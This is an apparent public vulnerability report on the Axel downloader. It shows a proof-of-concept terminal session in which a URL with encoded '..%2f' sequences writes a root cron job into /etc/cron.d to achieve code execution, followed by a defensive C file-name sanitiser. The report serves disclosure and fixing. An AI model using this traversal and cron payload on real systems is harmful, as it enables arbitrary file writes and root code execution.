Open
Description
I'm opening a public issue since it's the only option, according to @ismaell.
While Content-Disposition response header parsing takes special characters into account, such as slashes, to prevent path traversal writes in the filesystem, when a specially crafted URL is provided and no output option is provided, it's possible to write a file in an arbitrary location.
Steps to reproduce:
- Run the provided flask app afw-rce-poc.py
- Run Axel to fetch a URL with URL-encoded slashes
- Observe that it's possible to achieve remote code execution (cron job used for demonstration purposes)
```
root@machine:~/axel# ./axel "http://localhost/..%2f..%2f..%2f..%2fetc%2fcron.d%2ftest"
Initializing download: http://localhost/..%2f..%2f..%2f..%2fetc%2fcron.d%2ftest
File size: 32 byte(s) (32 bytes)
Opening output file ../../../../etc/cron.d/test
Server unsupported, starting from scratch with one connection.
Starting download
[100%] [.....................................................................................................................................................................................] [ 319.0B/s]
Downloaded 32 byte(s) in 0 second(s). (0.31 KB/s)
root@machine:~/axel# cat ../../../../etc/cron.d/test
* * * * * root touch /tmp/pwned
root@machine:~/axel# file /tmp/pwned
/tmp/pwned: cannot open `/tmp/pwned' (No such file or directory)
root@machine:~/axel# date
Tue Dec 23 13:47:51 UTC 2025
root@machine:~/axel# file /tmp/pwned
/tmp/pwned: empty
root@machine:~/axel# date
Tue Dec 23 13:48:04 UTC 2025
```

Will open a PR shortly to address this security issue.
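An added example, not part of the original issue and not Axel's code or the announced PR: one way a downloader can derive the output name from a URL so that percent-encoded separators cannot escape the working directory. The helper name `safe_output_name` and the policy (decode once, then keep only what follows the last separator, reject `.`, `..` and control bytes) are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hexval(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = (char)tolower((unsigned char)c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Hypothetical helper: derive a local file name from a URL. Decodes first,
 * then keeps only what follows the last separator. Returns 0 on success,
 * -1 if nothing safe remains (the caller should use a fixed default). */
int safe_output_name(const char *url, char *out, size_t outlen)
{
    const char *p = strstr(url, "://");
    size_t end, start, n = 0;

    p = strchr(p ? p + 3 : url, '/');        /* start of the path */
    if (!p || outlen == 0) return -1;
    end = strcspn(p, "?#");                  /* drop query and fragment */
    for (start = end; p[start - 1] != '/'; start--)
        ;                                    /* last raw path segment */
    for (size_t i = start; i < end; i++) {
        int c = (unsigned char)p[i];
        if (c == '%' && i + 2 < end && hexval(p[i + 1]) >= 0 && hexval(p[i + 2]) >= 0) {
            c = hexval(p[i + 1]) * 16 + hexval(p[i + 2]);
            i += 2;
        }
        if (c == '/' || c == '\\') { n = 0; continue; }  /* decoded separator */
        if (c < 0x20 || c == 0x7f || n + 1 >= outlen) return -1;
        out[n++] = (char)c;
    }
    out[n] = '\0';
    return (n == 0 || !strcmp(out, ".") || !strcmp(out, "..")) ? -1 : 0;
}

int main(void)
{
    /* Constructed input, same shape as the URL in the report. */
    char name[256];
    int rc = safe_output_name("http://localhost/..%2f..%2fetc%2fcron.d%2ftest", name, sizeof name);
    printf("%d %s\n", rc, rc == 0 ? name : "(rejected)");
    return 0;
}
```

Because decoding happens exactly once before the separator check, a doubly encoded `%252f` ends up as the literal characters `%2f` in the file name rather than as a path separator.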